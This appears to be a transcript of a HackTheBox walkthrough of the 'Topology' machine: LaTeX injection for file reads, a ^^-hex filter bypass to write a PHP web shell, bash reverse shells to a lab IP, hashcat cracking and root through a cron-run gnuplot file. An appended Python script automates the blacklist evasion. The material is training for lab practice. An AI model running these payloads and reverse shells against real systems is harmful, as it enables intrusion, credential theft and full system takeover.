What's going on YouTube, this is IppSec. We're doing Topology from HackTheBox, which starts off with finding a LaTeX generator. If you don't know what LaTeX is, think of it like an overcomplicated version of Markdown that just lets you have a bunch of syntax to create documents. It's popular in the scientific community because you can control exactly how documents look and use all the special characters and mathematical formulas and such. The syntax does have some things that let you include files and execute code. There is a filter that prevents you from using a lot of the dangerous functions, which I'll find a bypass for later in this video. I don't think it's on a lot of websites; it's probably unintended, so we can bypass the filter. The intended way is you include files off the server, eventually find the Apache config that has an .htpasswd location, crack the password, and then log in to the server with SSH. From there you discover a cron is running gnuplot every minute, I think, and you can put a malicious plot file up to get code execution as root. So with that being said, let's just jump in.

As always, we're going to start off with an nmap: -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put it in the nmap directory and call it topology, and then the IP address of 10.10.11.217. This can take some time to run, so I've already run it. Looking at the results we have two ports open. The first one is SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80; its banner tells us it's running Apache, also on Ubuntu, and we have some other things like the http-title script that says the page is a university. So let's just go take a look at the web server: 10.10.11.217, and we get a page. It looks like it is indeed a university, the Department of Mathematics, and it has some information here. They're talking about software projects they have done and they have a LaTeX equation generator. It's pronounced "lah-tech" or "lay-tech"; it's not "latex" as I used to always call it. I always got looks whenever I said it that way. It's like an old version of Markdown; like, Markdown is a simplified version of LaTeX, I guess I should say. This has been around since like the early or mid 80s, which is older than me.

If we click on it, it does not resolve because it is DNS, so let us do sudo vi /etc/hosts and we can add this hostname in, 10.10.11.217, and put it in. Essentially, why I say it's kind of like Markdown is you write your formulas in your document and it controls the exact precision of where it exists. So like if you ever played with Microsoft Word or any what-you-see-is-what-you-get editor and you're trying to fight line spacing, things like that, to get things looking good, or maybe just a bunch of special characters like we see here, you don't have that in LaTeX because you have much more control over it. The X is actually not the letter X, it's the Greek letter chi, spelled that way; it's like the X with some squigglies on it, because you could actually put that in here, so that's why it's called LaTeX.

But let's just go and see this. If we just say "hello world" and click generate, let's see exactly what happens. We just get "Hello World"; it prints that out. They give us a few things we could try, so we can try like \frac and it's just going to output these images, right? So any time we can control what goes into something, I always like: can we include files, run commands, things like that? So I'm going to Google "LaTeX hacks" and see if HackTricks has a page for typical injections, and it looks like it does. We have this Formula/CSV/Doc/LaTeX/GhostScript injection page, and LaTeX is one of them. So let's go to the page; we can search it, and I'm just hitting enter until we go down the page to where it exists, and we have it. We have like reading files, multiple lines, writing files, command execution. Command execution sounds great: we do \immediate\write18. So let us put that in.

If we go here, let's just try writing a file, and immediately we get "Illegal command detected". So it looks like they have some type of filtering in place. I'm going to try like \im, I don't know if this is a command, but I just want to see what happens, and we get nothing. Let's try \immediate and we get illegal command. So they definitely do have blacklisting of certain commands. If we try, what is it, write file, probably like \newwrite we may need... so if we try this, that does not blacklist, so that looks good. We can try some other things; we'll need like \openout, and we also need a \write, so we can try those to see if any of these commands are blacklisted. We have \openout; we do \write, we get illegal command detected. So if we wanted to evade the filter for writing a file we'd have to do a lot of Googling around to see if we can avoid this \write, and there is a way around this filter that I found. I don't know if it's documented on any website, so it's really cool. We'll do that after we go into the intended way.

So the intended way is reading files, but I didn't find it by just playing with it as you saw here; I kind of automated it. So I created a wordlist, so let's do wordlist.txt and then we can put all the things, so like \input, \include, and we need to put backslashes first. I'm probably going to pause the video and I'll just type all these in, because this probably isn't entertaining for you. So let's just speed things up, and now we have a decent wordlist of a bunch of potentially malicious commands we can do with LaTeX. So let's save that, and what we want to do is grab this URL. So I'm going to grab this and we use ffuf. So we'll do ffuf and then we do -u for URL, http://latex.topology.htb... I already had the whole thing on my clipboard, darn. Let's get rid of that and then we can put FUZZ here, and then we'll do -w for wordlist and I'm just going to say wordlist. So we'll just run this real quick and see what it shows, and we either have a size of 0 or 3244. Size of zero probably means the command failed, like if we just did \read it did this weird "contains errors" thing, right? I bet if we did a curl, hold on, let's do curl -v, we just get 200 OK. It says there's an image but it didn't actually put the image here, so that's what happens there. So what we can see is these are probably not blacklisted; this is probably the size of the illegal commands image. So I'm going to do -fs 3244, and you should always probably put your URLs here in single quotes. I did not do it, but if a command had two params and I didn't, then weird things would happen in bash, so you should always put that in single quotes. So let's filter the size 3244 and this is going to show us everything we can do. So we can read, open, close; we have this \lstinputlisting. So if we try this, if we put \lstinputlisting in the equation... if we went back here we could see what it is. So we just do that and then specify a file, so we do \lstinputlisting{/etc/passwd}. We still get an error, right? So what's happening here is it's just grabbing this; it's not putting it inline with the text, and to do that you use the dollar sign before and after the payload. Now that's going to tell it, hey, grab this and put it inline with the text, and we have the passwd file.

So the next logical thing to do would be trying to grab equation.php, so I'm going to copy this and we're just going to put it here, because right now my assumption is my working directory is the web root. It doesn't look like it is; I may try like a ../ and it's taking a bit longer, so maybe that works. If we also went to just the page latex.topology.htb, it is an open directory listing. We can see tempfiles; if we look at equation we could look at these files. I don't think we actually benefit that much from it, but we have the file here, so this is going to be the source code. I just want to do this one more time and show you one other thing. We look in tempfiles, it is empty, but we run this and then it's going to start generating information in the tempfiles that's used to create that picture we see here, right? And then after we get the picture the temp file will get deleted. There's a PDF, there's a PNG; click the PNG, it's already deleted, but that's what this is.

So scrolling to where the PHP code is, we can see the actual source. We have a filter strings right here and these are all the blacklisted commands, and looking through this I don't really see any exploit path. Since the application was writing in this tempfiles directory, the very first thing I was looking for is, is there a way we can control the file name, right? But if I look here we see $fileid = uniqid(rand(), true), so it's just getting a random value. It goes in here, appends the .tex format, so I don't think we have any way of writing like a PHP script here, because we don't control the file name, at least with the basic input. With the \write command we will be able to create a PHP script, and again we will do that in probably five minutes.

So the next step is finding other hosts on this server, and I kind of skipped that. So while I was poking at this I would probably recommend also using ffuf to look at virtual hosts, right? You always want to have some type of recon going on in the background. How many times have I said that, right? So let's run a ffuf and then we do -u for the URL and then -H will specify Host: FUZZ.topology.htb, and then the wordlist we'll use is /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt. So if we run this, and then let's just do filter size -fs 6767 because that's the most common one here. Actually, I think ffuf does have something cool that I have not shown. Let's see, auto; so we have this filter auto-calibration, -ac. I'm going to try that, I haven't actually done that. It's just going to make a few requests and decide what you want to filter, right? That's awesome. It's filtering words for 162 or 1612, 175, and 6767, so it kind of figures out what the most common response is and hides that from you. So we can see there is a dev and a stats subdomain. So if we did sudo vi /etc/hosts to add dev and stats to the hosts file so we can query it: stats.topology.htb, and we'll go to dev.topology.htb, whoops, http://dev.topology.htb. It's asking us for a credential. If we did stats, it's thinking; it's going to give us the server load of the box, so it's just an image here.

So knowing that there are different subdomains, the next thing I would be doing is trying to look at the Apache config to see if we can get anything. I'd also probably look at /etc/hosts, because a lot of times they may put all the hostnames in the hosts file. So I'm going to include, oh I don't want to do ../, I just want to do /etc/hosts, and we'll see if any domains are here. Doesn't look like there is. So the next place would be the Apache config. So if we do /etc/apache2, because I have it installed on my box, we can look at sites-enabled and the default place is going to be this 000-default.conf. If I didn't see it here I would try like latex.conf and dev.conf and just start guessing names in this directory, but let's just first try this. So we'll do sites-enabled and then 000-default.conf. It's going to take some time and it doesn't look like it pulled. Let's just copy and paste; I always like doing that instead of typing because I am notorious for making typos. It's taking some time, and there we go. I must have made a typo before, right? That's why we always use copy and paste when we can.

So here is the Apache config and we can see there is a /var/www/latex; that's going to be the equation generator page. Here is /var/www/dev, and then we also have /var/www/stats. So they could have put the password either in this config or they can also put it in the .htpasswd file of the directory. So I'm going to go to /var/www/dev/.ht... I'll try .htaccess first, because .htaccess is where you control the rights to it, right? And we can see it is putting authorization. We have AuthType Basic, so it wants HTTP basic authentication; here's the user file, /var/www/dev/.htpasswd, and Require valid-user. So if we try to grab this .htpasswd, it's thinking, and we have this. We could just type this hash out on our computer, send it over to hashcat and crack it, but I'm not going to do that because I'm notorious with typos, right? That's a lot to do, and I know a different way to exploit this box, and if we get a shell on the box we can just copy and paste it, right? So that's going to be a lot more fun.

And again, I didn't see this exactly on any known bypasses, but it's one of those that once you start looking into it, it's so obvious I would be surprised if it's not. So I'm going to try taking you down the journey that I went through trying to find this bypass, because as I've said before, that's what I view as important: the methodology to find the information you want in hacking. You're not going to memorize everything, but as long as you can just do good Googling I think you'll do fine. So the first thing I did was I started off with like "latex evasion bypass". Let's just try searching this; I don't know exactly what's going to come up here. We have security and autogenerated... this is a HackTricks page; this 0day.work I don't think is going to work because the domain is dead. So this one is talking about special characters, so we have like this character and it replaces with text, ASCII something. So my first thought was, okay, I can start using ffuf with a wordlist of a bunch of these special Unicode characters, and then maybe if I find one character that is the equivalent of \wr, I can finish it with "ite" and have a \write command. Unfortunately this page goes so slow and it took so long to do this, and I don't even know if there is... I think the author did a good job at highlighting the good ones and I don't think this is a good thing. He does list a bunch of other resources to read. We see this 0day one does not work, but typically when that happens I click the three dots here, let's see, got the source, where is the cache? I wonder if cache isn't available if I'm not logged in. Oh, there we go, cache is down here, so this is going to pull the cache of the page. If this doesn't go I go to like archive.org. But let's see, there was another one. I Googled like "bypass latex filters", or "latch"; you can see I used to call it latex for so long, it is habit. If I went here there is a Twitter post here, and I don't think this is going to show well because I don't think I'll be able to click on his actual profile because X does weird things if you're not logged in, but we see skirts talking about it, or I don't know how to pronounce his name. He follows me, so if you're watching this video, thank you for this blog post. I wish X let me click it, but we will go to his domain, which I want to say is skirts.rocks, because, well, he does rock. And if we go over to the blog we can find it, and this blog takes us like probably 90% of the way there. It's got a really cool bypass and he uses something called \catcode, and before here he's talking about the shell escape. The actual default is going to be shell restricted, which means there's only a safe set of commands able to be run. So that's why once we find the bypass we still won't be able to use like \write18 to get a reverse shell, because that only allows certain commands to be run, but we will be able to write a PHP file.

So what he is doing here is he's using \catcode and then you do this backtick, and that lets you say, hey, I want to specify it in, I'm going to say, ASCII format. I may be wrong with that, but you specify it with ASCII format, and he sends the control character, backslash @, and does =7, and what he says here is it makes the @ sign now behave as a superscript. And when a superscript is in LaTeX, if you do that twice then type something, it's going to be the hexadecimal value, right? So what he does is say, hey, this sign is now superscript, and let's do hex, right? So he has \input but the p is encoded in hex. So if I tried this, that backslash command unfortunately was on a blacklist, right? Illegal command. So I was searching like "latex superscript" because I was kind of curious exactly what that was. I think this will bring me to the page, let's see, no, I was searching "\catcode" because he used \catcode and I didn't know exactly what \catcode was. We go to their wiki page and it's going to talk about it, because my first thought was, can I do \catcode any other way? This is not showing it to me; I want to say the other post does. The top one asking the difference between what's \catcode and \catcode... so it's saying \catcode65 is the same thing as \catcode`a, and if we did man ascii and looked at "a" we can see that is going to be the decimal notation of "a". So I was trying really hard to find the decimal notation of backslash @. Unfortunately, if we did it with the decimal of backslash and the decimal notation of @, it doesn't work; I don't know exactly why. Let's see, what is it, I was trying probably 92 65, because 65 was... no, what is @? Now search: 64. So I was trying 92 64 and that did not work. So the reason is, I think, you can only use one character here, and backslash @ is two, and there's no decimal notation for that pair. But I got over to this page, which was the next one down, and @ is normally going to be 13; I found that out through ChatGPT. So they redefined it to be superscript, but it says superscript is normally just a caret, right? So that would mean if we did something like two carets and 70, ^^70, and generate this, it's not going to say 70, it's going to say p, right? So that looks good; this looks very promising. So we could go back to a \input, what was it, \lstinputlisting{/etc/passwd}. So the next thing I want to do is make sure this bypass works with a command. I need to put this in inline mode, there we go. So I'm going to take this p and we'll do two carets and 70. So in case the text is small there for you, what I put it to is that, right? So I just replaced the p with this and it still works. So now we have a potential way to bypass the filter. This page doesn't want to load; if you did view this, this one talked about writing a definition file and then using that definition file to rename commands. Unfortunately that doesn't help us, but this does, so we can do the hexadecimal thing.

So let's go back to HackTricks. So HackTricks, the CSV injection; I'm going to search latex, come on. I made the mistake of clicking the page, come on, maybe I'll just scroll down past it. Oh, I'm not even on that page anymore, I don't know what I clicked, that's why. There we go. So we could try the executing code but I know it doesn't work, so I'm not going to waste your time. Let's try writing a file, so I'm going to copy this, and first we're going to show this does not work. So vi malicious.txt, we'll paste it and we're going to do \openout, we'll do shell.php, and we will write PHP system... actually, before we do that, let's just write "hello world". Let's prove we can write things. If we overcomplicate our payload then it may fail and we won't know why it failed, so let's keep it as simple as possible. So we have this and then we want to put this all on one line, so we're trying to write shell.php. So let's grab this, copy, let's go to the equation and I'm just going to paste it there, and we see "Illegal command detected". So looking at this I see "e" is pretty much in everything, so that's going to be the thing I replace. So let's try viewing this; I'm going to use a search and replace. We'll say "e" is now, what is "e" in hex? It's 65. Go, g. So now we've replaced all "e" with that, so let's cat this again. We will copy it and paste, so copy, paste, and I'm hoping we get like a blank page or some generic error. Right, there we go, we got a blank page. So now we've got to find where that shell.php is. So we can do shell.php; it is not in the web root, but if we studied the code better (I did it because it was in PHP) you'll notice it did a cd to tempfiles, and that's where it is. The size is 12, so we wrote to it. So if we click it, it just says "hello world".

So now let's edit this and let's replace "hello world" with our reverse shell, or just a cradle so we can launch it. So we do <?php system($_REQUEST['cmd']) and we want to end it, and we'll do a semicolon there. So we just put something to execute. We can cat it, let's send it back over to the web server. So if we send this, it's thinking about it, it's still thinking about it, there we go, it finished. The file is blank, but if we do cmd=id it doesn't work. Uh-oh, I screwed something up here. So PHP system request cmd, I'm not going to put that semicolon, let's try that. Still not. Curse of the demo gods. So PHP system request, let's see. So what I'm going to do is stand up my own web server, so mkdir www, vi test.php, paste the script in. I see it now; syntax highlighting saved me, I don't have a parenthesis there. So what I was going to do, since I guess this is good troubleshooting, we can do php -S, 8000, let's see, :8000, network address, is it 127.0.0.1? There we go. So now we started up a PHP server on localhost. This is very much like the Python SimpleHTTPServer except it can execute PHP code. And we still can't... opening period, maybe I don't put the path in, let's just try that, just put the IP address. There we go, that looks better. So I did cmd=id and it works. The actual code we had though did not have that parenthesis, right? So if I had not noticed that and we were running it, we would see a syntax error; it expected a parenthesis. So that's what's happening. Let's go back to our write; I can add that parenthesis in, and then once that's done we can just do the cmd command and everything is going to work. There we go.

So now we get a reverse shell. I always go through Burp because I like just doing it in a POST request if I can, and the reason why I like that is because there are just fewer bad characters in a POST request, right? So I can do bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1', like that. Let's encode everything and then we can say nc -lvnp 9001, send this, and we get a shell. So let's do python3 -c 'import pty; pty.spawn("/bin/bash")', stty raw -echo; fg, and we'll do export TERM=xterm so we can clear the screen. But now we're on the server, right? So if I wanted to get that one file we did before that was in dev, that we just saw an image of, that .htpasswd, the reason why I don't see it in that ls is of course it hides files that begin with a period by default, right? But now that we have the hash we could try to crack it, right? And this actually isn't needed; if you got the shell this way you're golden, right? So let's do vi hashes and I'll call this htpasswd-topology, paste that in. We can do hashcat and then we're going to specify --username because we put the username in with our hash; that wasn't actually part of it, right? If I just copied this I wouldn't need the --username flag, but whenever I crack things I like adding the username as well, so when I go back and look at notes I can see what that hash went to. So the next thing we do is just specify the hash file and then the wordlist, /opt/wordlist/rockyou.txt, and hashcat is going to auto-detect it. And if you're curious how I just typed that directory so fast, I did Alt+period. So if we do echo "Please Subscribe" and I hit Alt+period, it's going to grab that very last argument I typed, which was the path there. So that's how I did that so quickly. We can see it cracked; we can scroll up and we see the password is calculus20. And then if I wanted to, we could get rid of the dictionary, I could just do a --show and it will just tell me what's in my potfile. That is vdaisley, here's the hash, and the password of calculus20.

So with that we could log into dev.topology.htb. I'm in Burp Suite, let's turn this off: http://dev.topology.htb, and then, was it vdaisley, the password, and it's just a static website, right? But this does go over to SSH, so if we were like spraying passwords as we crack them we could try vdaisley@topology.htb. I did not add that into it; we could do the IP address or just any subdomain because that goes to the IP. Put in vdaisley's password and we get logged in. So from here there's no difference; www-data will be able to do everything that this SSH connection can do. The next step is actually running pspy to discover a cron, but we've done that a bunch of other times. If you don't know what I'm talking about with pspy, just go to like ippsec.rocks, type in pspy and, oh my God, we run that a lot. It's a really cool tool that shows you when programs run, right? But I'm going to do it a slightly different way. Do I have the www directory? I do. So I'm going to copy /opt/peas/linpeas.sh over here and we're going to edit linpeas, because there are a few options that are just defaults, and one of them is going to be FAST. By default it's set to 1, which means it's not going to wait one minute to check processes and try su brute forces. So let's unset FAST; when we unset it a new option will appear to us. So let's stand up our web server, python3 -m http.server; PHP is listening on it, where are you PHP, kill you. Start that up, curl localhost:8000/linpeas.sh, pipe it over to bash. I don't know why I typed localhost, it's 10.10.14.8, which is my IP address. There we go, so linpeas is running.

I do want to put one word of caution out there: if you use this PHP thing, again, it can execute code. If you have PHP scripts in it, like I do with that test.php, if someone saw that and they executed it, they could shell my box, right? So I typically avoid using this PHP server; when I do, I always, always, always specify 127.0.0.1. Don't do 0.0.0.0, because you risk getting yourself owned, right? So let's just wait for this linpeas to finish. It's definitely not in fast mode now, so it's going to take a little bit to run, so I'm going to pause the video and resume when it's done.

Okay, so linpeas is done. First I'm going to copy this, because I like using this to jump around linpeas sections, and I'm going to search for Carlos, because Carlos Polop made it. So now I can just search down for that thing and we can just jump between all the sections. It's the best way, I think, to view linpeas; there are probably better ways, but that's how I do it. So we can look and there's nothing really too interesting. There is this Linux exploit suggester; I always say there are so many false positives there. Maybe one day I'll make a video on why that's such a hard thing to do, but it's not accurate, so I only look at that if I'm really, really stuck. We have the cleaned processes; this is "unexpected processes run by root"? Why'd it say that? This is just a list of processes; I guess that's telling us to look for weird and unexpected things, right? But there are not that many. We can see our reverse shell, we see Apache, not that much. Files open by, belonging to other users: none. Credentials in memory: none. Different processes executed during 1 minute: so this is where the FAST check came in helpful, right? Because we see cron started, and there is a gnuplot cron, and it's going to find any file in /opt/gnuplot that has a .plt extension and then execute it with this. So this find command, what this does: the -exec executes gnuplot, so this is the binary, and this open and close curly brace is going to take the output of find. So let's see, I can probably show that real quick, because if you don't use find that often it is a tricky thing. So we do find ., we have that; if we do -exec and then we'll do ls, and I think we have to do backslash semicolon. So it just found that and did an ls; if we do a cat it's going to cat all the files now, right? So again, the way it's doing it is just taking the output on the left side and executing it between this. Hopefully that makes sense, but you can see there are no unique crons; that is a cron that we don't have permission to read, but because we're examining processes we were able to see it, right? So it does find and executes gnuplot.

So the next thing to do would be like searching, let's do GTFOBins, see if it's there. If we search for gnuplot it is not on GTFOBins, so let's just do "gnuplot commands" and go to Google and research exactly what this is. If you don't know, it's being used to generate these graphs, right, on the stats page. So we have a quick reference, this is a PDF, here we go, I want the commands. So looking at this, which command looks interesting? system. System generally means run system commands, and in this case it does, right? So we just do system and the command string. So if we did vi, let's say, let's go /dev... oh it was in, what, /opt/gnuplot, and we don't have permission to read the directory. If we do an ls -la on /opt, any user, well this is user, group and then anyone: we have WX, which is write-execute, which means we can go in the directory, we can write to the directory. If we do touch please-subscribe it doesn't error out. We probably should have done please-subscribe to test, and we can cat it, we can view it, but since we don't have the read permission we can't list files in this directory. We can also get to it from a webshell, right? I cat test, I can also do it. So that's why I said we don't need to escalate to vdaisley if we found the LaTeX bypass, but having SSH is nice.

So let's just create a plot file, so I'll create malicious.plt. We'll say system and then bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 ...' like, oops, I'm drawing a major brain fart. Let's see, what did I use to send the shell? 0>&1, right, yeah. That's all muscle memory; once I made a typo and I wasn't typing the whole thing I just completely forgot what it was, weird. Okay, so now we have the system, nc -lvnp 9001, and I think this runs every minute, so if we do a date it'll probably run in about 20 seconds. So while we're waiting for that, if we wanted to get the output of this, we could just use the redirect, right? We could have done system "whoami" and then piped it like that and piped to a file, right? But if we wanted to, we could also look in, is it show? No, we want to look at print, because gnuplot does allow you to set print to files, right? So we have print expression; this is just like echo, but if we do set print we can see there are different ways to do it, right? I bet if we did set print and then a shell command, when we type print it'll get the output of that shell command as well. So that's another way we could have executed code if system is blacklisted, right? Because we can do this, and this is kind of like a Perl thing; I think Perl is one of the few languages I've seen that, like, if you prepend variables with a pipe then it executes a command. It's very weird. That does not look like it worked. bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1', like that, that should work. See, name.plt, cat malicious, it's not there anymore, is it? Oh, tab auto-complete doesn't work because of reasons, right, because we don't have read permission. So I'm going to try gnuplot on this file: gnuplot, "invalid command". Is it lowercase? Let's see, system, it may be lowercase. There we go, we got a shell. So now we just wait for the timer. There we go, it was a new minute right there, and we got root.

So that is pretty much the box. If you wanted to see using the print, we could do vi malicious.plt and then something like set print, let's do /dev/shm/pwned, we'll say output = system, let's just do a whoami, and then print output. So what that's going to do is we set the print command to say, hey, we don't want to print to standard out, we want to print to this file, and then we're running this system command and saying put the system command in the output variable, and then we're saying print the output variable. I think that is right, let's see. If we go back to print, I think that works. Let's see, we saved it, date, I think a new minute did pass, so /dev/shm; that did not work. vi /opt/gnuplot/malicious.plt, let's see, we probably need to do a dollar sign. And these are things I like doing after I solve the box; again, like when I found that LaTeX bypass I had solved the box the intended way, but I wanted to do it the unintended way as well. And they're doing system in parentheses, so let's try that as well, mirroring this exactly as they have it, right? date, we still don't have it; gnuplot malicious.plt, "cannot open script file", oh, /opt/gnuplot. That is probably because we didn't put it in parentheses, so always test your code, right? "No data block named output", so now it's working. So /dev/shm/pwned is currently vdaisley; if I wait one more section... that worked, well, it is now root. So that is how you can get it to output to a file. Hopefully you enjoyed the little bit of debugging session to figure out how that all works. Take care guys, and I will see you all next time.
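The filter bypass the video works out by hand (replace every "e" with ^^65 so the raw input no longer contains \write or \openout, while TeX's input scanner turns ^^65 back into "e" before it ever looks for command names) is mechanical enough to script. The block below is an added example written for this page; it is not IppSec's code, not the box's equation.php, and not the blog post's payload. BLACKLIST is a constructed stand-in for the generator's filter list (the real list is not reproduced here), and the example generalises the manual trick: instead of one hand-picked letter it greedily picks whichever letter is shared by the most still-matching terms and keeps going until the naive substring check finds nothing. The decoder reproduces TeX's ^^ rule (two lowercase hex digits give the byte, otherwise the following character is XORed with 0x40) so you can confirm the engine will see exactly the original payload. As the video notes, this only defeats a text filter in front of TeX; it does nothing about shell-escape being restricted, and it is a good illustration of why a substring blacklist on raw input is not a usable control for a TeX engine.

```python
"""Added example (not from the video, the box, or the cited blog): encode a
LaTeX payload with TeX's ^^XX hex notation so a naive substring blacklist
no longer matches it, then decode it the way TeX's scanner would."""
import string

# Constructed, hypothetical blacklist; the box's real filter list is not reproduced.
BLACKLIST = ["\\write", "\\immediate", "\\input", "\\include",
             "\\openout", "\\catcode", "\\def"]


def hex_escape(ch: str) -> str:
    """TeX ^^XX form of one 7-bit character. TeX only accepts lowercase hex digits."""
    code = ord(ch)
    if code > 0x7F:
        raise ValueError("^^XX notation only covers 7-bit characters")
    return "^^%02x" % code


def encode_letters(payload: str, letters: set) -> str:
    """Single pass over the ORIGINAL payload: escape every occurrence of the
    chosen letters and leave everything else alone. Working from the original
    each time avoids re-encoding hex digits inside an earlier ^^XX."""
    return "".join(hex_escape(c) if c in letters else c for c in payload)


def blacklist_hits(text: str, blacklist=BLACKLIST) -> list:
    """What a naive filter (plain substring containment) would flag, in list order."""
    return [term for term in blacklist if term in text]


def evade(payload: str, blacklist=BLACKLIST) -> str:
    """Greedy version of the manual trick: pick the letter shared by the most
    still-matching blacklist terms (the video picked 'e'), ^^XX-encode all of
    its occurrences, repeat until nothing matches. Unchanged if nothing matched."""
    chosen = set()
    encoded = payload
    while True:
        hits = blacklist_hits(encoded, blacklist)
        if not hits:
            return encoded
        counts = {}
        for term in hits:
            for ch in set(term):
                if ch in string.ascii_letters and ch not in chosen:
                    counts[ch] = counts.get(ch, 0) + 1
        if not counts:
            raise RuntimeError("cannot break %r by letter encoding" % hits)
        # most widely shared letter first, alphabetical tie-break for determinism
        best = min(counts, key=lambda c: (-counts[c], c))
        chosen.add(best)
        encoded = encode_letters(payload, chosen)


def decode_tex_hex(text: str) -> str:
    """Undo ^^ notation as TeX's scanner does: ^^ followed by two lowercase hex
    digits is that byte; ^^ followed by any other single char is char XOR 0x40
    (so ^^M is carriage return)."""
    out, i = [], 0
    while i < len(text):
        if text.startswith("^^", i) and i + 2 < len(text):
            pair = text[i + 2:i + 4]
            if len(pair) == 2 and all(c in "0123456789abcdef" for c in pair):
                out.append(chr(int(pair, 16)))
                i += 4
            else:
                out.append(chr(ord(text[i + 2]) ^ 0x40))
                i += 3
            continue
        out.append(text[i])
        i += 1
    return "".join(out)


if __name__ == "__main__":
    # Constructed sample: the file-write payload from the HackTricks page the video uses.
    payload = ("\\newwrite\\outfile\\openout\\outfile=shell.php"
               "\\write\\outfile{hello world}\\closeout\\outfile")
    print("filter flags:", blacklist_hits(payload))
    evaded = evade(payload)
    print("encoded    :", evaded)
    print("filter flags after encoding:", blacklist_hits(evaded))
    print("TeX sees original again    :", decode_tex_hex(evaded) == payload)
```

Run it as-is to see the HackTricks-style write payload get flagged, encoded, and pass the substring check while still decoding to the identical TeX source; swap in your own BLACKLIST to see how many letters the greedy loop needs before a given term list stops matching.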